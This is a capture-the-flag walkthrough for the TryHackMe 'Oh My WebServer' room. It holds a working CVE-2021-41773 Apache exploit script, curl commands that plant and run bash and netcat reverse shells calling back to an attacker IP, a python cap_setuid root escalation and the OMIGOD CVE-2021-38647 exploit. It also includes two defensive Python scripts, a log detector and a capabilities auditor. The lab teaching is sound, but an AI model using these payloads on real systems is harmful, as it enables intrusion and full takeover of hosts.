Oh My WebServer

You can find this machine here : https://tryhackme.com/room/ohmyweb

Port Scan

┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn -sV ohmyweb.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))

Directory Scan

┌──(kali㉿Zeus)-[~]
└─$  dirb http://ohmyweb.thm/

URL_BASE: http://ohmyweb.thm/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://ohmyweb.thm/ ----
==> DIRECTORY: http://ohmyweb.thm/
+ http://ohmyweb.thm/cgi-bin/ (CODE:403|SIZE:199

Wappalyzer - Port 80


Searching

Search : Apache httpd 2.4.49 exploit
Result : https://www.exploit-db.com/exploits/50383

Apache HTTP Server 2.4.49 - Path Traversal & RCE

CVE : CVE-2021-41773

#!/bin/bash
# PoC runner from exploit-db 50383: for every host in the list ($1) it sends the
# CVE-2021-41773 traversal request for path $2 through cgi-bin, passing $3 on stdin.

if [[ -z "$1" ]] || [[ -z "$2" ]]; then
    echo "Set [TARGET-LIST.TXT] [PATH] [COMMAND]"
    echo "./PoC.sh targets.txt /etc/passwd"
    exit 1
fi

for host in $(cat "$1"); do
    echo "$host"
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done
┌──(kali㉿Zeus)-[~/Desktop]
└─$ ./ohmyweb.sh targets.txt /bin/sh "whoami;id"
ohmyweb.thm
daemon
uid=1(daemon) gid=1(daemon) groups=1(daemon)
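Every request the PoC above sends is written to the Apache access log, so the traversal is easy to detect after the fact. The following Python script is an added example (it is not part of the original writeup or of the exploit-db PoC): it parses combined-format log lines, URL-decodes the request path until it stops changing, and flags requests whose decoded path contains a ".." segment that the raw path hid behind percent-encoding, which is exactly the shape of a CVE-2021-41773 request. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client, ident, user, [time], "METHOD path PROTO", status, ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 64 "-" "curl/7.74.0"
10.0.0.9 - - [10/Oct/2021:12:00:03 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1900 "-" "curl/7.74.0"
10.0.0.7 - - [10/Oct/2021:12:00:04 +0000] "GET /icons/../images/logo.png HTTP/1.1" 404 200 "-" "Mozilla/5.0"
"""


def decode_fully(path, limit=5):
    """URL-decode until the string stops changing (bounded), so nested encodings are unwrapped."""
    for _ in range(limit):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dotdot_segment(path):
    """True if any path segment (query string ignored) is exactly '..'."""
    return ".." in path.split("?", 1)[0].split("/")


def is_encoded_traversal(raw_path):
    """True when percent-encoding hides a '..' segment that the raw path does not show.
    A literal '..' is collapsed by Apache before the path is mapped, so it is not the CVE pattern."""
    return has_dotdot_segment(decode_fully(raw_path)) and not has_dotdot_segment(raw_path)


def scan_log(text):
    """Return one finding per request that uses encoded traversal."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        if not is_encoded_traversal(raw):
            continue
        decoded = decode_fully(raw)
        findings.append({
            "client": m.group("client"),
            "method": m.group("method"),
            "status": int(m.group("status")),
            "raw": raw,
            "decoded": decoded,
            # Traversal that starts under cgi-bin means the mapped file is executed, not just read.
            "via_cgi": decoded.startswith("/cgi-bin/"),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['method']} {f['status']} cgi={f['via_cgi']}: {f['decoded']}")
```

A status of 200 on a flagged request is the strongest signal that the server was still running the vulnerable 2.4.49 build; a patched server returns 400 or 403 for the same request. The benign "/icons/../images/logo.png" line is deliberately not flagged, because the literal ".." is normalised by Apache before mapping and would only generate noise.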


Reverse Shell Creation

Source : https://www.youtube.com/watch?v=WSVcuV2Wc58

curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/alienum.sh'
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/10.18.45.56/4444 0>&1" >> /tmp/alienum.sh'
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; cat /tmp/alienum.sh'
curl 'http://ohmyweb.thm/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; bash /tmp/alienum.sh'


Better Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo;fg
ENTER
export TERM=xterm
export HOME=/home

LinPeas

Files with capabilities (limited to 50):
/usr/bin/python3.7 = cap_setuid+ep

Linux Capabilities - Privileges Escalation

daemon@4a70924bafa0:~$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
daemon@4a70924bafa0:~$
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
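The getcap output above is the whole story: an interpreter with an effective cap_setuid is root for anyone allowed to run it. The following Python script is an added example (not part of the writeup or of LinPEAS) of how an auditor would triage "getcap -r /" output automatically: it parses both getcap output formats (the older "PATH = caps+flags" and the newer "PATH caps=flags"), keeps only capabilities that cross a privilege boundary, and ranks a finding as critical when the capability is effective on an interpreter. The getcap lines are a constructed sample.

```python
import os
import re

# Capabilities that, when effective on a binary the user can run, let the process
# cross the normal privilege boundary. The text is what the audit reports.
DANGEROUS_CAPS = {
    "cap_setuid": "process may call setuid(0) and become root",
    "cap_setgid": "process may change its gid to any group",
    "cap_sys_admin": "broad administrative capability (mounts, namespaces, ...)",
    "cap_dac_override": "bypasses file read/write/execute permission checks",
    "cap_dac_read_search": "bypasses file read permission checks",
    "cap_sys_ptrace": "may attach to and control other processes",
    "cap_sys_module": "may load kernel modules",
}

# Programs that run arbitrary user-supplied code: a capability on them is granted
# to whoever can execute them.
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|php|node|bash|sh|gdb|vim)[\d.]*$")

# getcap prints either "PATH = caps+flags" (older libcap) or "PATH caps=flags" (newer).
GETCAP_LINE_RE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<spec>\S+)$")

# Constructed sample of "getcap -r / 2>/dev/null" output, mixing both formats.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/local/bin/helper cap_dac_read_search=p
"""


def parse_getcap_line(line):
    """Split one getcap line into (path, [cap names], flag letters); None if unparseable."""
    m = GETCAP_LINE_RE.match(line.strip())
    if not m:
        return None
    parts = re.split(r"[+=]", m.group("spec"), maxsplit=1)
    names = parts[0].split(",")
    flags = parts[1] if len(parts) > 1 else ""
    return m.group("path"), names, flags


def audit_getcap(text):
    """Return findings for every binary carrying a dangerous capability, most severe first."""
    findings = []
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names, flags = parsed
        risky = [n for n in names if n in DANGEROUS_CAPS]
        if not risky:
            continue
        effective = "e" in flags  # 'e': applied automatically at exec, no raise() needed
        interpreter = bool(INTERPRETER_RE.match(os.path.basename(path)))
        if interpreter and effective:
            severity = "critical"  # arbitrary code runs with the capability
        elif effective:
            severity = "high"
        else:
            severity = "medium"    # permitted only: the program must raise it itself
        findings.append({
            "path": path,
            "caps": risky,
            "flags": flags,
            "interpreter": interpreter,
            "severity": severity,
            "reason": "; ".join(DANGEROUS_CAPS[c] for c in risky),
        })
    order = ["critical", "high", "medium"]
    return sorted(findings, key=lambda f: order.index(f["severity"]))


if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print(f"[{f['severity']}] {f['path']} {','.join(f['caps'])}+{f['flags']}: {f['reason']}")
```

Run it against "getcap -r / 2>/dev/null" output saved from a host; the fix for a critical finding is "setcap -r" on the interpreter (or a dedicated, non-interpreter helper if the capability is genuinely needed), which is the same remediation the Docker image in this room lacks.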

User Owned - Proof


Found IP


Host Discovery

  • awk


  • arp
root@4a70924bafa0:~# arp -a
ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1) at 02:42:1e:60:bf:4a [ether] on eth0


Port Scan

Binary here : https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

curl 10.18.45.56/nmap -o nmap


  • Starting the Scan
root@4a70924bafa0:~# ./nmap 172.17.0.1 -p- --min-rate 4000

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown


Identify The Service (Port 5986)


OMIGOD Unauthenticated RCE

  • Source : https://github.com/AlteredSecurity/CVE-2021-38647
  • Source : https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/
wget https://raw.githubusercontent.com/AlteredSecurity/CVE-2021-38647/main/CVE-2021-38647.py
python3 -m http.server 80
curl 10.18.45.56/CVE-2021-38647.py -o exploit.py


python3 exploit.py -t 172.17.0.1 -p 5986 -c 'id'


Reverse Shell - Root Owned

python3 exploit.py -t 172.17.0.1 -p 5986 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.18.45.56 6666 >/tmp/f'
